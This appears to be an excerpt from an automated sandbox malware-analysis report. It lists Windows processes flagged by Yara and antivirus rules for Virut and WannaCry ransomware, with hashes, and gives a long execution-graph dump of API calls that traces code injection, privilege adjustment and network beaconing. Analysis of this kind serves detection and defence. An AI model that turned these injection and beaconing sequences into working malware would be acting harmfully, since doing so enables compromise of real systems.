                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.785329413.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000000.310448882.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.784858725.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:25
                                                                              Start time:17:51:30
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:26
                                                                              Start time:17:51:31
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.319687483.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.785023367.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.319657354.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:27
                                                                              Start time:17:51:32
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\dwm.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:dwm.exe
                                                                              Imagebase:0x7ff7aa950000
                                                                              File size:62464 bytes
                                                                              MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.321636086.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.321813327.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000002.785061929.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.321645741.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.321842635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:28
                                                                              Start time:17:51:41
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                              Imagebase:0x7ff7748d0000
                                                                              File size:19352 bytes
                                                                              MD5 hash:B7FC4A29431D4F795BBAB1FB182B759A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:29
                                                                              Start time:17:51:44
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\tasksche.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\WINDOWS\tasksche.exe /i
                                                                              Imagebase:0x400000
                                                                              File size:3514368 bytes
                                                                              MD5 hash:3233ACED9279EF54267C479BBA665B90
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp, Author: us-cert code analysis team
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000001D.00000000.347152674.000000000040E000.00000008.00000001.01000000.00000008.sdmp, Author: us-cert code analysis team
                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 85%, Metadefender, Browse
                                                                              • Detection: 95%, ReversingLabs

                                                                              General

                                                                              Target ID:30
                                                                              Start time:17:51:46
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:31
                                                                              Start time:17:52:02
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000000.384952230.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000002.785042903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:32
                                                                              Start time:17:52:04
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000000.389181031.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000002.785080117.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:33
                                                                              Start time:17:52:06
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000000.392931300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000002.785141452.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:34
                                                                              Start time:17:52:12
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000002.785106286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000000.407443351.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:35
                                                                              Start time:17:52:14
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.785122913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000000.411115059.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:36
                                                                              Start time:17:52:19
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                              Imagebase:0x7ff7748d0000
                                                                              File size:19352 bytes
                                                                              MD5 hash:B7FC4A29431D4F795BBAB1FB182B759A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:37
                                                                              Start time:17:52:22
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000000.427531330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.785172242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:38
                                                                              Start time:17:52:24
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000000.431362516.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.785177108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:39
                                                                              Start time:17:52:25
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000000.435545169.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:40
                                                                              Start time:17:52:26
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:4.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:63.2%
                                                                                Total number of Nodes:687
                                                                                Total number of Limit Nodes:11
                                                                                execution_graph 6313 7fea4c6b 6316 7fea4c9e 6313->6316 6317 7fea4caa 6316->6317 6324 7fea4499 6317->6324 6319 7fea4cb7 6320 7fea4499 5 API calls 6319->6320 6323 7fea4d64 6319->6323 6321 7fea4d58 6320->6321 6322 7fea4499 5 API calls 6321->6322 6321->6323 6322->6323 6325 7fea44c2 CreateFileA 6324->6325 6326 7fea44a3 GetFileAttributesA 6324->6326 6329 7fea44fc CreateFileMappingA 6325->6329 6326->6325 6327 7fea44af SetFileAttributesA 6326->6327 6327->6325 6331 7fea4573 MapViewOfFile 6329->6331 6333 7fea45a8 6331->6333 6333->6319 6648 b9443b 6651 b9144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6648->6651 6650 b94441 6651->6650 6652 b9663a 6655 b96647 6652->6655 6656 b96644 6655->6656 6657 b96652 6655->6657 6657->6656 6659 b96658 6657->6659 6660 b92574 5 API calls 6659->6660 6661 b9666a 6660->6661 6661->6656 6497 7fea43ad 6498 7fea43b9 6497->6498 6501 7fea43dd 6498->6501 6500 7fea43c4 6504 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6501->6504 6503 7fea43e3 6503->6500 6504->6503 6505 b902fe 6506 b90415 6505->6506 6508 b9042d 6506->6508 6537 b910ce 6508->6537 6510 b9048f 6511 b904dd 6510->6511 6512 b904b0 GetModuleHandleA 6510->6512 6513 b904f8 GetVersion 6511->6513 6512->6511 6514 b9050f VirtualAlloc 6513->6514 6529 b905ca 6513->6529 6515 b905a9 FindCloseChangeNotification 6514->6515 6516 b90532 6514->6516 6515->6529 6516->6515 6541 b905ba 6516->6541 6517 b905d3 SetProcessAffinityMask 6544 b905f2 GetModuleHandleA 6517->6544 6519 b906fc lstrcpyW 6566 b924ae lstrcpyW lstrlenW 6519->6566 6521 b9074c NtMapViewOfSection 6521->6515 6521->6529 6522 b90717 GetPEB lstrcpyW lstrcatW 6523 b924ae 3 API calls 6522->6523 6523->6529 6525 b90780 NtOpenProcessToken 6526 b907c5 CreateToolhelp32Snapshot Process32First 6525->6526 6525->6529 6527 b907eb Process32Next 6526->6527 6528 b90865 FindCloseChangeNotification 6527->6528 6527->6529 6528->6515 6529->6515 6529->6517 6529->6519 6529->6521 6529->6522 6529->6525 6529->6527 6530 b907fd OpenProcess 6529->6530 6533 b907b7 CreateToolhelp32Snapshot Process32First 6529->6533 6534 b9085c FindCloseChangeNotification 6529->6534 6535 b90834 CreateRemoteThread 6529->6535 6536 b905ba Sleep 6529->6536 6569 b907ac 6529->6569 6592 b92574 6529->6592 6530->6527 6530->6529 6533->6527 6534->6527 6535->6529 6535->6534 6536->6534 6539 b910db 6537->6539 6538 b9115c 6538->6510 6539->6537 6539->6538 6540 b91133 GetModuleHandleA GetProcAddress 6539->6540 6540->6539 6542 b905c9 6541->6542 6543 b905bf Sleep 6541->6543 6542->6515 6543->6541 6545 b910ce 2 API calls 6544->6545 6558 b905ca 6545->6558 6546 b905a9 FindCloseChangeNotification 6546->6558 6547 b905d3 SetProcessAffinityMask 6548 b905f2 30 API calls 6547->6548 6548->6558 6549 b906fc lstrcpyW 6550 b924ae 3 API calls 6549->6550 6550->6558 6551 b9074c NtMapViewOfSection 6551->6546 6551->6558 6552 b90717 GetPEB lstrcpyW lstrcatW 6553 b924ae 3 API calls 6552->6553 6553->6558 6554 b90780 NtOpenProcessToken 6555 b907c5 CreateToolhelp32Snapshot Process32First 6554->6555 6554->6558 6556 b907eb Process32Next 6555->6556 6557 b90865 FindCloseChangeNotification 6556->6557 6556->6558 6557->6546 6558->6546 6558->6547 6558->6549 6558->6551 6558->6552 6558->6554 6558->6556 6559 b907fd OpenProcess 6558->6559 6560 b907ac 30 API calls 6558->6560 6561 b92574 5 API calls 6558->6561 6562 b907b7 CreateToolhelp32Snapshot Process32First 6558->6562 6563 b9085c FindCloseChangeNotification 6558->6563 6564 b90834 CreateRemoteThread 6558->6564 6565 b905ba Sleep 6558->6565 6559->6556 6559->6558 6560->6558 6561->6558 6562->6556 6563->6556 6564->6558 6564->6563 6565->6563 6567 b96ce7 6566->6567 6568 b924ea NtCreateSection 6567->6568 6568->6529 6611 b9144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6569->6611 6571 b907b2 FreeLibrary FindCloseChangeNotification 6572 b907c5 CreateToolhelp32Snapshot Process32First 6571->6572 6573 b907eb Process32Next 6572->6573 6574 b90865 FindCloseChangeNotification 6573->6574 6579 b905ca 6573->6579 6576 b905a9 FindCloseChangeNotification 6574->6576 6575 b907fd OpenProcess 6575->6573 6575->6579 6576->6579 6577 b92574 5 API calls 6577->6579 6578 b905d3 SetProcessAffinityMask 6580 b905f2 29 API calls 6578->6580 6579->6573 6579->6575 6579->6576 6579->6577 6579->6578 6581 b9085c FindCloseChangeNotification 6579->6581 6582 b90834 CreateRemoteThread 6579->6582 6583 b905ba Sleep 6579->6583 6584 b906fc lstrcpyW 6579->6584 6586 b9074c NtMapViewOfSection 6579->6586 6587 b90717 GetPEB lstrcpyW lstrcatW 6579->6587 6589 b90780 NtOpenProcessToken 6579->6589 6590 b907ac 29 API calls 6579->6590 6591 b907b7 CreateToolhelp32Snapshot Process32First 6579->6591 6580->6579 6581->6573 6582->6579 6582->6581 6583->6581 6585 b924ae 3 API calls 6584->6585 6585->6579 6586->6576 6586->6579 6588 b924ae 3 API calls 6587->6588 6588->6579 6589->6572 6589->6579 6590->6579 6591->6573 6612 b9252f NtOpenSection 6592->6612 6594 b9257c 6595 b92661 6594->6595 6596 b92582 NtMapViewOfSection FindCloseChangeNotification 6594->6596 6595->6529 6596->6595 6598 b925ba 6596->6598 6597 b925ef 6614 b92477 NtProtectVirtualMemory NtWriteVirtualMemory 6597->6614 6598->6597 6613 b92477 NtProtectVirtualMemory NtWriteVirtualMemory 6598->6613 6600 b92600 6615 b92477 NtProtectVirtualMemory NtWriteVirtualMemory 6600->6615 6603 b92611 6616 b92477 NtProtectVirtualMemory NtWriteVirtualMemory 6603->6616 6605 b92622 6608 b92637 6605->6608 6617 b92477 NtProtectVirtualMemory NtWriteVirtualMemory 6605->6617 6607 b9264c 6607->6595 6619 b92477 NtProtectVirtualMemory NtWriteVirtualMemory 6607->6619 6608->6607 6618 b92477 NtProtectVirtualMemory NtWriteVirtualMemory 6608->6618 6611->6571 6612->6594 6613->6597 6614->6600 6615->6603 6616->6605 6617->6608 6618->6607 6619->6595 6383 7fea33e0 6384 7fea344e 6383->6384 6387 7fea33e5 6383->6387 6386 7fea345f NtQuerySystemInformation 6384->6386 6391 7fea35f3 6384->6391 6385 7fea346f MapViewOfFile CloseHandle 6390 7fea34b0 6385->6390 6385->6391 6386->6385 6387->6385 6387->6387 6388 7fea3440 NtOpenSection 6387->6388 6388->6384 6389 7fea34b7 UnmapViewOfFile 6389->6391 6390->6389 6390->6391 7091 7fea6620 7092 7fea6647 5 API calls 7091->7092 7093 7fea662a 7092->7093 6681 7fea2665 6683 7fea266b CreateThread CloseHandle 6681->6683 6684 7fea3c38 6683->6684 6686 7fea3c3d 6684->6686 6687 7fea3ca9 6686->6687 6690 7fea3c5b GetWindowsDirectoryA 6686->6690 6741 7fea252f NtOpenSection 6687->6741 6689 7fea3cae 6692 7fea3cfb GetSystemDirectoryA 6689->6692 6693 7fea3cb5 6689->6693 6694 7fea3d26 6690->6694 6786 7fea3d1f lstrcat 6692->6786 6742 7fea3cc2 GetModuleHandleA 6693->6742 6828 7fea3d36 LoadLibraryA 6694->6828 6741->6689 6743 7fea3ccc 6742->6743 6744 7fea3cde 6742->6744 6747 7fea3cd4 GetProcAddress 6743->6747 6869 7fea3cf0 GetModuleHandleA 6744->6869 6747->6744 6787 7fea3d26 6786->6787 6788 7fea3d36 151 API calls 6787->6788 6789 7fea3d2b GetProcAddress LoadLibraryA 6788->6789 6791 7fea3d7d 6789->6791 6792 7fea10ce 2 API calls 6789->6792 6793 7fea3d92 GetTickCount 6791->6793 6792->6791 6794 7fea3daa 6793->6794 6795 7fea3e47 GetVolumeInformationA 6794->6795 6796 7fea3e7a 6795->6796 6797 7fea3f25 6796->6797 6798 7fea3eb5 96 API calls 6796->6798 6800 7fea3f4f 6797->6800 6801 7fea3f31 CreateThread CloseHandle 6797->6801 6799 7fea3ea9 6798->6799 6799->6797 6804 7fea3eca GetModuleFileNameA wsprintfA 6799->6804 6802 7fea3f60 43 API calls 6800->6802 6801->6800 6803 7fea3f54 6802->6803 6805 7fea3f7e 6803->6805 6806 7fea10ce 2 API calls 6803->6806 6807 7fea3f14 6804->6807 6808 7fea3f8f 23 API calls 6805->6808 6806->6805 6807->6797 6810 7fea3405 5 API calls 6807->6810 6809 7fea3f83 6808->6809 6811 7fea3fd6 CreateThread CloseHandle 6809->6811 6812 7fea3ffa CreateEventA 6809->6812 6810->6797 6811->6812 6825 7fea4012 6812->6825 6813 7fea4056 lstrlen 6813->6813 6814 7fea4065 gethostbyname 6813->6814 6814->6825 6815 7fea4320 RtlExitUserThread 6816 7fea4081 socket 6818 7fea40a6 connect 6816->6818 6816->6825 6817 7fea42d0 SetEvent 6817->6825 6820 7fea42b7 closesocket 6818->6820 6818->6825 6819 7fea42f2 Sleep ResetEvent 6819->6825 6820->6825 6821 7fea40ef GetVersionExA 6821->6825 6822 7fea4172 wsprintfA 6822->6825 6823 7fea41a7 CreateThread CloseHandle 6823->6825 6824 7fea41f6 GetTickCount 6824->6825 6825->6813 6825->6814 6825->6815 6825->6816 6825->6817 6825->6819 6825->6820 6825->6821 6825->6822 6825->6823 6825->6824 6826 7fea4288 Sleep 6825->6826 6826->6825 6827 7fea4294 GetTickCount 6826->6827 6827->6825 7027 7fea3d4b GetProcAddress LoadLibraryA 6828->7027 6912 7fea26d4 6869->6912 6872 7fea3d1f 179 API calls 6873 7fea3d12 GetProcAddress LoadLibraryA 6872->6873 6875 7fea3d7d 6873->6875 6876 7fea10ce 2 API calls 6873->6876 6877 7fea3d92 GetTickCount 6875->6877 6876->6875 6878 7fea3daa 6877->6878 6879 7fea3e47 GetVolumeInformationA 6878->6879 6880 7fea3e7a 6879->6880 6881 7fea3f25 6880->6881 6914 7fea3eb5 LoadLibraryA 6880->6914 6884 7fea3f4f 6881->6884 6885 7fea3f31 CreateThread CloseHandle 6881->6885 6946 7fea3f60 LoadLibraryA 6884->6946 6885->6884 6913 7fea26c8 GetSystemDirectoryA 6912->6913 6913->6872 6968 7fea3ecc GetProcAddress GetModuleFileNameA wsprintfA 6914->6968 6947 7fea10ce 2 API calls 6946->6947 6948 7fea3f7e 6947->6948 6949 7fea3f8f 23 API calls 6948->6949 6950 7fea3f83 6949->6950 6951 7fea3fd6 CreateThread CloseHandle 6950->6951 6952 7fea3ffa CreateEventA 6950->6952 6951->6952 6965 7fea4012 6952->6965 6953 7fea4056 lstrlen 6953->6953 6954 7fea4065 gethostbyname 6953->6954 6954->6965 6955 7fea4320 RtlExitUserThread 6956 7fea4081 socket 6958 7fea40a6 connect 6956->6958 6956->6965 6957 7fea42d0 SetEvent 6957->6965 6960 7fea42b7 closesocket 6958->6960 6958->6965 6959 7fea42f2 Sleep ResetEvent 6959->6965 6960->6965 6961 7fea40ef GetVersionExA 6961->6965 6962 7fea4172 wsprintfA 6962->6965 6963 7fea41a7 CreateThread CloseHandle 6963->6965 6964 7fea41f6 GetTickCount 6964->6965 6965->6953 6965->6954 6965->6955 6965->6956 6965->6957 6965->6959 6965->6960 6965->6961 6965->6962 6965->6963 6965->6964 6966 7fea4288 Sleep 6965->6966 6966->6965 6967 7fea4294 GetTickCount 6966->6967 6967->6965 6969 7fea3f14 6968->6969 6970 7fea3f25 6969->6970 6997 7fea3405 6969->6997 6972 7fea3f4f 6970->6972 6973 7fea3f31 CreateThread CloseHandle 6970->6973 6974 7fea3f60 43 API calls 6972->6974 6973->6972 6975 7fea3f54 6974->6975 6976 7fea3f7e 6975->6976 6977 7fea10ce 2 API calls 6975->6977 7006 7fea3f8f LoadLibraryA 6976->7006 6977->6976 6998 7fea343b 6997->6998 6998->6998 6999 7fea3440 NtOpenSection 6998->6999 7000 7fea344e 6999->7000 7001 7fea345f NtQuerySystemInformation 7000->7001 7005 7fea35f3 7000->7005 7002 7fea346f MapViewOfFile CloseHandle 7001->7002 7004 7fea34b0 7002->7004 7002->7005 7003 7fea34b7 UnmapViewOfFile 7003->7005 7004->7003 7004->7005 7005->6970 7007 7fea3f9d 7006->7007 7008 7fea4320 RtlExitUserThread 7006->7008 7009 7fea10ce 2 API calls 7007->7009 7010 7fea3fb5 7009->7010 7010->7008 7011 7fea3fc2 WSAStartup CreateThread CloseHandle 7010->7011 7012 7fea3ffa CreateEventA 7011->7012 7015 7fea4012 7012->7015 7013 7fea4056 lstrlen 7013->7013 7014 7fea4065 gethostbyname 7013->7014 7014->7015 7015->7008 7015->7013 7015->7014 7016 7fea4081 socket 7015->7016 7017 7fea42d0 SetEvent 7015->7017 7019 7fea42f2 Sleep ResetEvent 7015->7019 7020 7fea42b7 closesocket 7015->7020 7021 7fea40ef GetVersionExA 7015->7021 7022 7fea4172 wsprintfA 7015->7022 7023 7fea41a7 CreateThread CloseHandle 7015->7023 7024 7fea41f6 GetTickCount 7015->7024 7025 7fea4288 Sleep 7015->7025 7016->7015 7018 7fea40a6 connect 7016->7018 7017->7015 7018->7015 7018->7020 7019->7015 7020->7015 7021->7015 7022->7015 7023->7015 7024->7015 7025->7015 7026 7fea4294 GetTickCount 7025->7026 7026->7015 7028 7fea10ce 2 API calls 7027->7028 7029 7fea3d7d 7028->7029 7030 7fea3d92 GetTickCount 7029->7030 7031 7fea3daa 7030->7031 7032 7fea3e47 GetVolumeInformationA 7031->7032 7033 7fea3e7a 7032->7033 7034 7fea3f25 7033->7034 7035 7fea3eb5 96 API calls 7033->7035 7037 7fea3f4f 7034->7037 7038 7fea3f31 CreateThread CloseHandle 7034->7038 7036 7fea3ea9 7035->7036 7036->7034 7041 7fea3eca GetModuleFileNameA wsprintfA 7036->7041 7039 7fea3f60 43 API calls 7037->7039 7038->7037 7040 7fea3f54 7039->7040 7042 7fea3f7e 7040->7042 7043 7fea10ce 2 API calls 7040->7043 7044 7fea3f14 7041->7044 7045 7fea3f8f 23 API calls 7042->7045 7043->7042 7044->7034 7047 7fea3405 5 API calls 7044->7047 7046 7fea3f83 7045->7046 7048 7fea3fd6 CreateThread CloseHandle 7046->7048 7049 7fea3ffa CreateEventA 7046->7049 7047->7034 7048->7049 7062 7fea4012 7049->7062 7050 7fea4056 lstrlen 7050->7050 7051 7fea4065 gethostbyname 7050->7051 7051->7062 7052 7fea4320 RtlExitUserThread 7053 7fea4081 socket 7055 7fea40a6 connect 7053->7055 7053->7062 7054 7fea42d0 SetEvent 7054->7062 7057 7fea42b7 closesocket 7055->7057 7055->7062 7056 7fea42f2 Sleep ResetEvent 7056->7062 7057->7062 7058 7fea40ef GetVersionExA 7058->7062 7059 7fea4172 wsprintfA 7059->7062 7060 7fea41a7 CreateThread CloseHandle 7060->7062 7061 7fea41f6 GetTickCount 7061->7062 7062->7050 7062->7051 7062->7052 7062->7053 7062->7054 7062->7056 7062->7057 7062->7058 7062->7059 7062->7060 7062->7061 7063 7fea4288 Sleep 7062->7063 7063->7062 7064 7fea4294 GetTickCount 7063->7064 7064->7062 6276 